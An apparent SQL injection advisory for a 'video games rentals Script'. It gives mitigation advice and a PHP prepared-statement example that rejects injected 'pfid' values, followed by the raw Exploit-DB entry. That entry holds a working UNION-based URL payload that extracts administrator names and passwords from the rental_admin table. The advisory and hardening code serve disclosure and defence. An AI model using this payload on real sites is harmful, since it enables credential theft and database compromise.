Vendor: video games rentals Script
By: JaMbA
CVSS: 7.5 (HIGH)
CWE: 89 (SQL injection)
Product Name: video games rentals Script
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Platforms Tested: Windows & Linux
Year: 2010

video games rentals Script SQL injection Vulnerability

The video games rentals Script is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 'pfid' parameter of the 'index.php' page. This can lead to unauthorized access, data manipulation, and potential compromise of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing SQL queries. Also, implementing parameterized queries or using prepared statements can help prevent SQL injection attacks.
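
The mitigation above applied to the 'pfid' and 'item_type' parameters of the catalog view, as an added example that is not the vendor's code. The catalog_items table, its columns, the sample row and the function names are assumptions constructed for the demo; it uses PDO with in-memory SQLite so it runs offline.

```php
<?php
declare(strict_types=1);

// Only 'G' appears in the advisory; the real application's type codes are unknown.
const ALLOWED_ITEM_TYPES = ['G'];

// Constructed in-memory database. "catalog_items" and its columns are
// hypothetical; five columns mirror the five-column result in the demo request.
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE catalog_items
               (id INTEGER, title TEXT, pfid INTEGER, item_type TEXT, price REAL)');
    $db->exec("INSERT INTO catalog_items VALUES (1, 'Sample Game', 5, 'G', 3.5)");
    return $db;
}

// Hardened lookup for view=catalog: validate both parameters, then bind them.
// Returns null when the input is invalid so the caller can answer HTTP 400.
function catalog_lookup(PDO $db, array $query): ?array
{
    $pfid = filter_var($query['pfid'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    $type = $query['item_type'] ?? null;
    if ($pfid === false || !in_array($type, ALLOWED_ITEM_TYPES, true)) {
        return null; // rejected before any SQL is built
    }
    // Placeholders keep the values out of the SQL text entirely.
    $stmt = $db->prepare(
        'SELECT id, title, pfid, item_type, price
           FROM catalog_items
          WHERE pfid = :pfid AND item_type = :type'
    );
    $stmt->bindValue(':pfid', $pfid, PDO::PARAM_INT);
    $stmt->bindValue(':type', $type, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = demo_db();
// Constructed inputs: a normal request, then values that are not positive integers.
foreach (['5', '-5 union select 1', '-5', ''] as $pfid) {
    $rows = catalog_lookup($db, ['pfid' => $pfid, 'item_type' => 'G']);
    printf("pfid=%-22s => %s\n", var_export($pfid, true),
           $rows === null ? 'rejected' : count($rows) . ' row(s)');
}
```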

Exploit-DB raw data:

# Exploit Title: video games rentals Script SQL injection Vulnerability
# Date: 11/02/2010
# Author: JaMbA
# Software Link: N/A
# Version: all version
# Tested on: Windows & Linux
# CVE : ()

:::::::::::::::::::::::::

Exploit Title : video games rentals Script SQL injection Vulnerability

Author : JaMbA

Script Site : www.commodityrentals.com

Version : All Versions

Tested on : Windows & Linux

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

=====================================Exploit===============

=========================

[ EXPL0!T ]

www.[Server].com/[Path]/index.php?view=catalog&pfid=5[exploit code]&item_type=G

[ D3M0 ]

http://server/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G


Have Fun :D

===========================================================

=========================

Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
=== 3SI lycee jbel jloud ====